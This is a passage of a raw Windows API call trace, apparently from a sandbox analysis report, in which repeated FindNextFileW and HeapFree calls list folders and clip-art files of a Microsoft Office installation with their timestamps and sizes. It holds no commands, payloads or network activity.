ftLastAccessTime.dwLowDateTime=0xed8e4f0c, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xed8e4f0c, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft Office", cAlternateFileName="MICROS~2")) returned 1 [0173.096] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0173.096] FindNextFileW (in: hFindFile=0x801e98, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf982bd9c, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManifests", cAlternateFileName="PACKAG~1")) returned 1 [0174.065] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea3238 | out: hHeap=0x710000) returned 1 [0174.065] FindNextFileW (in: hFindFile=0x801e98, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0174.087] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea2230 | out: hHeap=0x710000) returned 1 [0174.087] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0175.175] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18f8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SHOW_01.MID", cAlternateFileName="")) returned 1 [0175.175] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a0a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL00256_.WMF", cAlternateFileName="")) returned 1 [0175.175] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ca4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL00260_.WMF", cAlternateFileName="")) returned 1 [0175.175] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf5c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL00268_.WMF", cAlternateFileName="")) returned 1 [0175.175] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1dac, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL00286_.WMF", cAlternateFileName="")) returned 1 [0175.176] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1268, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL00298_.WMF", cAlternateFileName="")) returned 1 [0175.176] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20e0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL00308_.WMF", cAlternateFileName="")) returned 1 [0175.176] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL00345_.WMF", cAlternateFileName="")) returned 1 [0175.176] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL00452_.WMF", cAlternateFileName="")) returned 1 [0175.176] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1db8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL00712_.WMF", cAlternateFileName="")) returned 1 [0175.176] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcdc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL01040_.WMF", cAlternateFileName="")) returned 1 [0175.176] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL01041_.WMF", cAlternateFileName="")) returned 1 [0175.176] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b04, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL01394_.WMF", cAlternateFileName="")) returned 1 [0175.176] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x138c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL01395_.WMF", cAlternateFileName="")) returned 1 [0175.177] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SL01565_.WMF", cAlternateFileName="")) returned 1 [0175.177] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x36aa, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00017_.WMF", cAlternateFileName="")) returned 1 [0175.177] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32f6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00018_.WMF", cAlternateFileName="")) returned 1 [0175.177] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7a80, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00152_.WMF", cAlternateFileName="")) returned 1 [0175.177] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4754, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00157_.WMF", cAlternateFileName="")) returned 1 [0175.177] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2026, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00159_.WMF", cAlternateFileName="")) returned 1 [0175.177] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x35b2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00166_.WMF", cAlternateFileName="")) returned 1 [0175.177] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00168_.WMF", cAlternateFileName="")) returned 1 [0175.178] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2242, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00170_.WMF", cAlternateFileName="")) returned 1 [0175.178] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f0e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00177_.WMF", cAlternateFileName="")) returned 1 [0175.178] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x283c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00183_.WMF", cAlternateFileName="")) returned 1 [0175.178] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x514c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00190_.WMF", cAlternateFileName="")) returned 1 [0175.178] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2090, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00191_.WMF", cAlternateFileName="")) returned 1 [0175.178] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x280c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00192_.WMF", cAlternateFileName="")) returned 1 [0175.178] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00194_.WMF", cAlternateFileName="")) returned 1 [0175.179] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x238c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00197_.WMF", cAlternateFileName="")) returned 1 [0175.179] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15fe, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00199_.WMF", cAlternateFileName="")) returned 1 [0175.179] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2926, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00200_.WMF", cAlternateFileName="")) returned 1 [0175.179] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ea0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00208_.WMF", cAlternateFileName="")) returned 1 [0175.179] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f72, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00212_.WMF", cAlternateFileName="")) returned 1 [0175.180] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f74, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00221_.WMF", cAlternateFileName="")) returned 1 [0175.180] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e5c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00222_.WMF", cAlternateFileName="")) returned 1 [0175.180] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3642, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00223_.WMF", cAlternateFileName="")) returned 1 [0175.180] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x476e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00257_.WMF", cAlternateFileName="")) returned 1 [0175.180] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd8e0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00289_.WMF", cAlternateFileName="")) returned 1 [0175.180] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10cb8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00299_.WMF", cAlternateFileName="")) returned 1 [0175.180] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7a04, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00305_.WMF", cAlternateFileName="")) returned 1 [0175.181] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xee4a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00333_.WMF", cAlternateFileName="")) returned 1 [0175.181] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b96, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00345_.WMF", cAlternateFileName="")) returned 1 [0175.181] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, 